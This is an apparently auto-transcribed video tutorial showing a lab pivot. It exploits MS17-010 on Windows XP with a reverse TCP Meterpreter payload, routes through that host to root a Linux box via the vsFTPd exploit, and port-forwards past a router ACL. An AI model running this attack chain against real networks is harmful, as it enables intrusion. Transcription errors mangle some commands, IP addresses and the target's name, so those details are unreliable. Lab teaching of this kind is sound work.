Hello guys, and welcome to this new tutorial on my channel. Today we are going to see how we can perform a pivoting throughout a network protected by an access control list. Here we have a router in which we have put this access control list blocking the telnet, the HTTP, the HTTP, the FTP and the others. So here we have our Kali Linux, here Windows XP, and here Meterpreter. So what we are going to do exactly in this exercise is we are going to use Kali Linux to exploit Windows XP, and then throughout this session we are going to pivot to attack the Meterpreter machine. Okay, here there is our Kali Linux system with the IP address 192.168.0.10. We have also our Windows XP machine with the address 172.16.0.10, and finally we have our Meterpreter with the address 10.0.0.10. okay, as we can see here on the Windows system, we can access the HTTP server on Meterpreter, and we can also ping the Meterpreter machine. So ping 10.0.0.10. okay, here we have the reply to our ping, but in our Kali Linux we cannot ping the Meterpreter. All the packets are filtered. Okay, so and also we could see that we cannot access the HTTP service from our Kali Linux. Okay, here we are unable to connect to our HTTP server on Meterpreter. So let's begin. First, what we are going to do is to ensure that we can ping the Windows system. Okay, so the connection is established between our Kali Linux system and the Windows system. Now we are going to use Nmap to detect vulnerabilities on our Windows machine. Okay, once the vulnerability scanning is finished, you can see a couple of vulnerabilities. Here we have the first one, MS08-067. Yes, another one, MS17-010. we are going to use MS17-010. so we can now launch, let me save console. Okay, now Meterpreter is working. So we are going to search the vulnerabilities MS17-010. okay, here we have a couple of exploits. We are going to use this exploit, so use selection. Okay, then we are going to set payload Windows / Meterpreter / reverse TCP. okay, show options. Here we have to specify our L host. Set L host. L host is our own IP address, so 192.168.0.10. we are also going to set L host on 72.16.0.10. we are going to type exploit to exploit our Windows system. Voila, so we have a Meterpreter session on our Windows system. Now we can type a couple of commands to see get PID, for example. Get PID, have a lot of information. So what we are going to do is, for now we have successfully attacked the Windows XP machine with the Meterpreter session. We are going to background that session, and throughout the session we are going to exploit Meterpreter. So let's proceed. First we are going to run throught to 110.0.0.0/8. Okay, now we have added a route from our Windows system to Meterpreter. Now we can background our session. Okay, and if you type sessions, we could see that our first session is that, and we have a connection here between our Kali Linux system and our Windows system. Okay, now what we are going to do now is we are first going to scan for open ports on our Meterpreter. Okay, so we're going to use auxiliary scanner port scan TCP. Okay, show options. Okay, here we are going to specify air host, set air host 10. We are going to reduce the number of ports, so set ports 1 to 1000. And now we can try to exploit. Okay, as we can see here, we have these ports open: 25, 23, 21, 22. Okay, what we are going to do is we are going to ensure that the system we are going to hack is Meterpreter systems. Search NB name. Okay, we are going to use that. Okay, show options. Set air host 10.0.0.10 and exploit. Okay, now when scanning the NetBIOS, you can see that our IP address 10.0.0.10 is exactly Meterpreter, the system we are going to hack. As we saw previously, there is port 21 open. This means that FTP is running on our target system, so we are going to search for FTP version. So search FTP version. Okay, here we have an exploit. Use to scan the version of TCP running on Meterpreter. So show options, and here you have just to put set air host 10.0.0.10. okay, and exploit. Here we see that the FTP version is VSFTPD. We can try to search about vulnerabilities on VS FTP. Here we have one exploit for Unix systems. We are going to use it. Okay, show options. We have to specify the air host here. Set air host 10.0.0.10. okay, and then you can try to exploit. Okay, now we have a shell, so we can just, who am I? We are root. PWD. We are root users. Okay. If config, you can see that. Also, you can type uname that we are Linux. Okay, now we can background this session. Also, yes, you can see that we have two sessions. So the first session is the result of our attack on Windows, and the second session is a shell obtained after our pivoting. We have accessed the Meterpreter system. Now we are going to try to access the web server, because firstly it was possible, but sessions -i are going to 2. So here's the command: port forward at -p remote port -r remote host -l local port. And okay, now we are going to try 171.27.0.0.1 8888. Okay, now as we see, we have an access to the Meterpreter HTTP server. Until now, we have succeeded to hack the Windows system, and throughout the Windows system we make a pivoting, and then we hack Meterpreter Linux, in which we try to have a CMD shell. Okay, so that's all for this tutorial. Thank you, and just comment if you have a specific question about the principle we use, or if you have some advice, or also if you know another method to do the same thing as we did in the tutorial. Just tell me that in comments, and don't forget to like the video and subscribe, so that you can't miss the next tutorials. Bye for now.